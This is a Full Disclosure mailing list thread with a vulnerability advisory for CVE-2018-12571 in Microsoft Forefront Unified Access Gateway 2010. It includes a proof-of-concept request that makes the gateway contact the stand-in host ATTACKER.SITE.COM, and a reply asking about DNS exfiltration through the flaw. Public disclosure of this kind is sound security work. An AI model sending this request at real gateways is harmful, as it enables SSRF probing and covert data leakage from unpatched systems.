Re: [FD] Microsoft Forefront Unified Access Gateway 2010 External DNS Interaction

2018-07-06 Thread Thierry Zoller 


Can this be used to perform DNS exfiltration ? (Assuming the UGW is
whitelisted to perform DNS (which it likely must be)

> # Exploit Title: Microsoft Forefront Unified Access Gateway 2010 External
> DNS Interaction
> # Vendor Homepage: https://www.microsoft.com/
> # Version: 2010
> # CVE : CVE-2018-12571
> # Proof of Concept #1
> 
> Microsoft Forefront Unified Access Gateway 2010 allows remote attackers to
> trigger outbound DNS queries for arbitrary hosts via a comma-separated list
> of URLs in the orig_url parameter, possibly causing a traffic amplification
> and/or SSRF outcome.
> 
> /uniquesig697e96fe58e5694d9b118768d8189a4c/uniquesig0/InternalSite/InitParams.aspx?referrer=/InternalSite/StartApp.asp%5Fid=8B92B86E36904E2FA83C890F8C864A50%5Ftype=0%5Fname=test=0=47c74c53%2Dfaae%2D41ae%2D89f1%2D1eb6eff34091&*orig%5Furl=http%3A%2F%2FATTACKER.SITE.COM
> %2Ftest*
> 
> # Fixes
> 
> It will not be patched by Microsoft.
> 
> ___
> Sent through the Full Disclosure mailing list
> https://nmap.org/mailman/listinfo/fulldisclosure
> Web Archives & RSS: http://seclists.org/fulldisclosure/
> 
> 



___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Re: [FD] Microsoft Forefront Unified Access Gateway 2010 External DNS Interaction

2018-07-02 Thread okan coskun 
# Exploit Title: Microsoft Forefront Unified Access Gateway 2010 External
DNS Interaction
# Vendor Homepage: https://www.microsoft.com/
# Version: 2010
# CVE : CVE-2018-12571
# MSRC: Case 39000
# Proof of Concept #1

Microsoft Forefront Unified Access Gateway 2010 allows remote attackers to
trigger outbound DNS queries for arbitrary hosts via a comma-separated list
of URLs in the orig_url parameter, possibly causing a traffic amplification
and/or SSRF outcome.

/uniquesig697e96fe58e5694d9b118768d8189a4c/uniquesig0/Intern
alSite/InitParams.aspx?referrer=/InternalSite/StartApp.asp&
resource%5Fid=8B92B86E36904E2FA83C890F8C864A50%5Ftype=
0%5Fname=test=0=47c74c53%2Dfaae%
2D41ae%2D89f1%2D1eb6eff34091%5Furl=http%3A%2F%2FATTACKER.SITE.COM
%2Ftest

# Fixes

It will not be patched by Microsoft.

Reason:
We have completed our investigation and determined that the case doesn't
meet the bar for servicing in a security update

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/